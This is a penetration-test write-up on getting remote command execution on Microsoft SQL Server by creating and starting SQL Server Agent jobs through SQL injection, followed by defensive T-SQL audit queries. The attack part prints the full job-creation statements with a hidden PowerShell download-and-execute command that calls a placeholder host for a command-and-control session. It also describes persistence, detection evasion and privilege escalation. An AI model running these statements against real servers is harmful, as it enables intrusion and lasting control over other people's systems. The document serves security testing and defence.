Overview
If the SQL Server Agent service is running on an MSSQL database server, an attacker can abuse functionality that ships with MSSQL Server itself to obtain a shell on the host.
SQL Server Agent
SQL Server Agent is a Windows service that can be used to perform automated tasks.
Attack analysis
The goal is to use features built into MSSQL Server to execute arbitrary commands on the underlying Windows operating system. Throughout the test, the xp_cmdshell stored procedure was disabled and the ability to create custom stored procedures was restricted.
When the xp_cmdshell extended stored procedure is used in an attack, most security monitoring and detection systems raise alerts. Its misuse by attackers and penetration testers has led many organizations to disable or restrict xp_cmdshell.
MSSQL Server Agent can be used to execute arbitrary commands on the target database server, but the target must meet several conditions:
- The SQL Server Agent service must be enabled on the target server.
- The database user account in use must have sufficient permissions to create and execute Agent jobs.
Two Agent job subsystems are relevant here: CmdExec, which executes operating system commands, and PowerShell, which executes PowerShell scripts.
A SQL injection point can be used to create and start an Agent job. The command the job executes is PowerShell code that makes the target system connect to an Optiv-controlled IP address and download further PowerShell instructions. This establishes an interactive command-and-control session between the target database server and the Optiv-controlled server.
The following code shows the SQL statements split into separate lines. In the download command, the URI is wrapped in doubled single quotes rather than double quotes: doubling a single quote is how it is escaped inside a SQL string literal.
USE msdb;
EXEC dbo.sp_add_job @job_name = N'test_powershell_job1';
EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''http://IP_OR_HOSTNAME/file''))"', @retry_attempts = 1, @retry_interval = 5;
EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1';
EXEC dbo.sp_start_job N'test_powershell_job1';
Attack test
As shown, the SQL statement has been URL-encoded. In this example the attack is delivered in an HTTP GET request, so the payload must be URL-encoded.
The SQL injection payload is appended to a parameter of the HTTP GET request so that the injection fires. (Note the %20, a space character, added at the beginning of the payload.)
When the payload runs, the command-and-control session is established successfully and runs with the permissions of the "SQLServerAgent" account.
On the target host's SQL Server, the SQL Agent job can be seen to have been created successfully.
Summary
If the target host runs the SQL Server Agent service and the account used by the Agent service can reach other MSSQL servers, this technique can be used to run Agent jobs on those servers as well. A scheduled Agent job can also be created, so the method not only evades security detection but also provides persistent control of the target MSSQL server.
In some cases, if the SQL Server Agent service runs under a highly privileged account, the technique can also be used to escalate privileges.
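The conditions listed under "Attack analysis" (Agent service running, rights to create jobs, CmdExec/PowerShell subsystems) and the persistence and privilege concerns in the summary are all things a defender can audit directly in the instance. The T-SQL below is an added example, not code from the original write-up or from Optiv; it assumes SQL Server 2008 R2 SP1 or later (for sys.dm_server_services) and a login with VIEW SERVER STATE plus read access to msdb. Each query uses only documented msdb catalog tables and server views.

```sql
-- Added audit script (assumption: run by a sysadmin or a login with
-- VIEW SERVER STATE and SELECT on msdb). Nothing here modifies the server.

-- 1. Is the Agent service running, and under which Windows account?
--    An injected job step executes as this service account (or a proxy),
--    so a highly privileged account here is the escalation risk noted above.
SELECT servicename, status_desc, startup_type_desc, service_account
FROM sys.dm_server_services
WHERE servicename LIKE 'SQL Server Agent%';

-- 2. Surface-area configuration: 'Agent XPs' is switched on automatically
--    when the Agent service starts; xp_cmdshell is shown for comparison.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('Agent XPs', 'xp_cmdshell');

-- 3. Every job step that reaches the operating system through the CmdExec
--    or PowerShell subsystem, with owner, creation time and schedule state.
--    A scheduled job of this kind is the persistence mechanism described
--    in the summary; unscheduled ones are run on demand via sp_start_job.
SELECT j.name                      AS job_name,
       SUSER_SNAME(j.owner_sid)    AS job_owner,
       j.enabled,
       j.date_created,
       s.step_id,
       s.step_name,
       s.subsystem,
       s.command,
       CASE WHEN js.schedule_id IS NULL THEN 'unscheduled'
            ELSE 'scheduled' END   AS schedule_state,
       js.next_run_date
FROM msdb.dbo.sysjobs         AS j
JOIN msdb.dbo.sysjobsteps     AS s  ON s.job_id  = j.job_id
LEFT JOIN msdb.dbo.sysjobschedules AS js ON js.job_id = j.job_id
WHERE s.subsystem IN ('CmdExec', 'PowerShell')
   OR s.command LIKE '%powershell%'
   OR s.command LIKE '%downloadstring%'
ORDER BY j.date_created DESC;

-- 4. Who can create or run jobs without being sysadmin: members of the
--    msdb SQLAgent* fixed database roles. Any web application login that
--    appears here satisfies the "sufficient permissions" condition.
SELECT r.name AS agent_role, m.name AS member_name, m.type_desc
FROM msdb.sys.database_role_members AS drm
JOIN msdb.sys.database_principals   AS r ON r.principal_id = drm.role_principal_id
JOIN msdb.sys.database_principals   AS m ON m.principal_id = drm.member_principal_id
WHERE r.name LIKE 'SQLAgent%'
ORDER BY r.name, m.name;
```

Query 3 is the one worth scheduling as a recurring check: the job created in the write-up would appear with subsystem = 'PowerShell', an owner equal to the injected application login, and no schedule row. Query 4 points at the least-privilege fix, since an application login that is not sysadmin and not in any SQLAgent* role cannot call sp_add_job at all, which removes the second precondition entirely.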
MSSQL Agent Job Server: Remote Command Execution